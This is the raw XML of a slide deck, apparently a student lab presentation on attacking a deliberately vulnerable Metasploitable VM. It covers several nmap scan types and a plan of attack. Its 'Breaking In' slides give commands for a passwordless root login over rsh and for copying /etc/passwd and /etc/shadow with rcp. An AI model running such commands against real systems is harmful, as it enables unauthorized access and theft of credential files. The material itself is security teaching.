              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Printers print anything sent to that port, this leads to lots of HTTP GET requests and generates lots of useless data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>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All Port Scanning Metasploitable</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Basic Scan on Metasploitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Shape 139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510325" y="1200150"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>nmap -v --allports (ip address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>We can see all the open ports and closed ports on the metasploitable vm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="Shape 140"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519125" y="1852900"/>
            <a:ext cx="4105749" cy="3072950"/>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Stealth Scan on Metasploitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nmap -sS --allports (ipaddress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Yields the same results as the regular scan approximately using SYN Packets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4484500" y="2719247"/>
            <a:ext cx="4202299" cy="2206599"/>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 name="Shape 35"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 36"/>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a:t>Day 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</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sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>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Version Scan on Metasploitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Shape 153"/>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30200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Using nmap -sV --allports (ipaddress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Shows us all the ports that are open and their version and service, because it’s metasploitable there are many open and exploitable ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1528750" y="2390762"/>
            <a:ext cx="6086475" cy="2752725"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>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ACK Scan on Metasploitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nmap -sA --allports (ipaddress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This shows that all ports are unfiltered, cause metasploit, making the entire system very vulnerable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Shape 161"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848150" y="4040012"/>
            <a:ext cx="5581650" cy="885825"/>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Scanning and Categorizing Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Shape 167"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="5647799" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So looking at the list of open ports from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> we can see they are all open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This means categorizing them is easy: Open - all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Shape 168"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104928" y="1305598"/>
            <a:ext cx="2840544" cy="3725699"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>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Plan of Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 174"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8428800" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Now that we know exactly what’s vulnerable, we can use specific exploits for each one of these services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>FTP, SSH, Telnet, SMTP, HTTP, RPC, NetBIOS, NFS, MySQL, VNC, IRC, remote shell...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proof-of-concept exploits will be provided.</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sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 179"/>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Breaking In: The “r” Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>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06400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>TCP ports 512-514</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>Provide various levels of interaction, command execution on remote hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>Work through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rsh-client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>512: rexec/rexecd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>RCE + authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>513: rlogin/rlogind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatic remote login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>514: rsh/rshd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2800"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>  + authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800"/>
              <a:t>FOR LAN USE ONLY!!!!!!!</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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rsh -l [user] [target]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rsh -l root 10.211.55.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Doesn’t even ask for password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>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Breaking In: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1154637" y="2790575"/>
            <a:ext cx="6834724" cy="2352925"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="3583799" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500"/>
              <a:t>Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rcp [remote host]:[path] [local path]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rcp 10.211.55.8:/etc/passwd ~/Desktop/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No password required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>List of all users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 193"/>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sz="3000"/>
              <a:t>Breaking In: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rcp </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="3000"/>
              <a:t>to grab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>/etc/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="Shape 194"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637351" y="964260"/>
            <a:ext cx="3583799" cy="3961588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Shape 199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="913900"/>
            <a:ext cx="3583799" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500"/>
              <a:t>Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rcp [remote host]:[path] [local path]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In our case: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rcp 10.211.55.8:/etc/shadow ~/Desktop/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No password required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-387350" lvl="0" marL="457200" rtl="0">
